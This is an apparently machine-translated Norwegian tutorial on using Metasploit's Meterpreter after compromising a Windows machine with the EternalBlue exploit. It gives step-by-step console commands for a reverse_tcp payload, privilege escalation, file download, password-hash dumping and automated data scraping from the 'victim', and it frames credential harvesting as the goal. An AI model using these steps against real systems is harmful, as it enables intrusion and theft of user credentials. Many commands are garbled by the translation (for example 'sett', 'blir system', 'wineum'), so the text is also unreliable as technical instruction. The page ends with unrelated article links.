metasploit

Etter utnyttelse med Meterpreter

Etter utnyttelse med Meterpreter
Dette er en introduksjon til Meterpreter-nyttelasttillegget innen Metasploit. I denne korte opplæringen vil vi diskutere hvordan du bruker den til å bruke postutnyttelse på et WINDOWS OS-system når du allerede har brutt det med Eternalblue-utnyttelsen. Vi vil begrense oss til å få tilgang til Windows-systemet og utforske det, og alle tingene vi skal gjøre vil fokusere på tilgang til informasjon og brukerlegitimasjon.

Introduksjon til Meterpreter

Meterpreter er et angrepsmessig nyttelast i Metasploit-rammeverket som lar gjerningsmannen kontrollere og navigere offerdatamaskinen gjennom et kommandoskall. Det kan vise seg å være et veldig allsidig verktøy når det gjelder penetrasjonstesting.  Det er et verktøy for etterutnyttelse som er basert på DLL-injeksjon i minnet, noe som betyr at den injiserte DLL kjører ved å lage en ny prosess som krever at systemet kjører den injiserte DLL-en. Det kan gi deg tilgang til et usynlig kommandoskall på en offermaskin, slik at du kan kjøre kjørbare filer og profilnettverk.

Den ble opprinnelig skrevet for Metasploit 2.x og er oppgradert for Metasploit 3.

Vi vil diskutere bruken av Meterpreter i detalj, men før det, la oss ha et ord om nyttelast generelt

Hva er nyttelaster?

Nyttelast i Metasploit er moduler, noe som betyr at de er kodebiter i Metasploit som kjører på det eksterne systemet vi målretter mot. Utnyttelsesmodulen sendes først, som installerer nyttelastmodulen på systemet. Da gir nyttelast tilgang til angriperen (begrenset eller fullverdig, avhenger av innholdet i nyttelasten). For å videreutvikle funksjonen til nyttelaster, må vi diskutere typene, som er totalt 3:

Singler

Disse nyttelastene er helt selvstendige, noe som betyr at disse kan være like grunnleggende som gatekeeper-koder som lar brukeren komme inn i et målsystem.

Stagers

Stagers er nyttelaster som samler applikasjoner i målsystemet og sender det til angriperen. Det etablerer forbindelsen mellom offeret til vår lokale maskin.

Stadier

Når stagers har tilgang til systemet, laster de ned trinnmodulene. Stages-moduler fjerner størrelseshetten på måleren.

Eksempler på trinn vil være et enkelt skall, iPhone 'ipwn' skall, Meterpreter-moduler, VNC Injection.

Du kan finne ut hvilken type nyttelast ved å finne navnet. Enkelt nyttelast er vanligvis av formatet /

Utnyttelse med Meterpreter

Først og fremst starter du MSF-konsollen ved å skrive følgende terminalkommando i Kali-terminalvinduet.

$ sudo msfconsole

Vi bruker reverse_tcp som stager og Meterpreter som scenen.

Vi begynner med å sette opp den evige blå utnyttelsen. Velg (ms17_010_eternalblue) og sett deretter windows / x64 / meterpreter / reverse_tcp som valgt nyttelast

Deretter konfigurerer du exploit-innstillingene og kjører exploit med exploit-kommandoen:

$ sett nyttelastvinduer / x64 / meterpreter / reverse_tcp
$ sett rhost 192.168.198.136
$ utnytte

De Eternalblue utnytte har blitt aktivert.

Etter utnyttelse

Vi får tilgang til og manipulerer det allerede kompromitterte systemet under etter utnyttelsen.

Vi kan gjøre mange ting nå som vi har tilgang til systemet, men som nevnt ovenfor, skal vi fortsette å fokusere på å laste ned informasjon og få brukerlegitimasjon her

Administrere tilgangsrettigheter:

Avhengig av nyttelastmodulen og utnyttelsen du har brukt, kan du bli utsatt for visse tilgangsbegrensninger som vil forringe dine evner til å manøvrere offermaskinen. Du kan omgå dette problemet med opptrapping av privilegier ved å slette passord og tukle med registrene. Du kan også eskalere privilegier ved å bruke Meterpreters get system-command.

$ blir system
$ getuid

Filoverføring med Meterpreter

Med Meterpreter kan du laste ned en fil ved hjelp av $ download-kommandoen.

$ nedlasting / windows / system32 / drivere / etc / verter

På samme måte kan du også laste opp informasjon til maskinen ved hjelp av $ upload-kommando

Pakke ut brukerlegitimasjon:

Bruk kodeskript credential_collector for å trekke ut informasjon om brukerkontoer, eller bruk hash dump post-modulen til lignende effekt.

Vi vil bruke hash dump post-modulen for å fortsette med å høste legitimasjonen. Skriv inn følgende msf-kommando.

$ kjøre innlegg / windows / samle / hashdump

Som vi kan se, har vi fått Coen-, gjest- og adminkontoer. LM-hash (admin's) og NTLM (guest's) hash gjelder tomme passord, mens Coen-hash er et passord du må knekke. Du kan gjøre det ved å bruke en passordknekker.

Automatisering av systemskraping

Det kan være kjedelig å samle informasjon med individuelle inngangssetninger om at du må fortsette å mate kommandoskallet. Praktisk, du kan automatisere denne prosessen noe med vinstokk. Skriptet samler informasjon fra offeret og laster ned dataene til vår lokale maskin. Du vil bli fortalt hvor utdataene lagres, som du kan se i fjerde linje ovenfra:

$ kjøre wineum

Husk at banen der utdataene til hver kommando er lagret, kan være forskjellig fra den som vises her.

Lar rote litt mer

Utføre filer

Du kan kjøre hvilken som helst fil på systemet ved å bruke: execute -f . Dette inkluderer både kjørbare filer og programmer med flere støttefiler. Hvis du for eksempel vil kjøre den innebygde kalkulatorappen i Windows OS, skriver du execute -f calc.exe

Ta skjermbilder

Du kan også ta skjermbilder fra brukerens synspunkt. Bare skriv skjermbilde i Meterpreters kommandoskall, så får du et skjermbilde av skjermen på systemet.

$ execute -f calc.exe
$ skjermbilde

Konklusjon:

Dette har vært en kort introduksjon til Meterpreter-pluginet i Metasploit-rammeverket, sammen med en kort guide som viser de mest grunnleggende bruksområdene. Vi har her lært hvordan vi kan bryte et Windows OS-system med Eternalblue-utnyttelse for å få tilgang, og deretter bruke Meterpreter til å eskalere privilegier, samle informasjon manuelt og ved å automatisere vineus-kommandoen. Vi har også lært å kjøre filer på offerets maskin.

Meterpreter kan tjene som et merkbart middel for deteksjon av sårbarheter, til tross for at det er en sammenslåing av grunnleggende verktøy innenfor Metasploits rammeverk.

5 beste arkadespill for Linux
I dag er datamaskiner seriøse maskiner som brukes til spill. Hvis du ikke kan få den nye høye poengsummen, vil du vite hva jeg mener. I dette innlegge...
Kamp for Wesnoth 1.1. 3.6 Utvikling utgitt
Kamp for Wesnoth 1.1. 3.6 utgitt i forrige måned, er den sjette utgivelsen i 1.1. 3.x-serien, og den leverer en rekke forbedringer, spesielt til bruke...
Slik installerer du League Of Legends på Ubuntu 14.04
Hvis du er fan av League of Legends, er dette en mulighet for deg å prøvekjør League of Legends. Merk at LOL støttes på PlayOnLinux hvis du er en linu...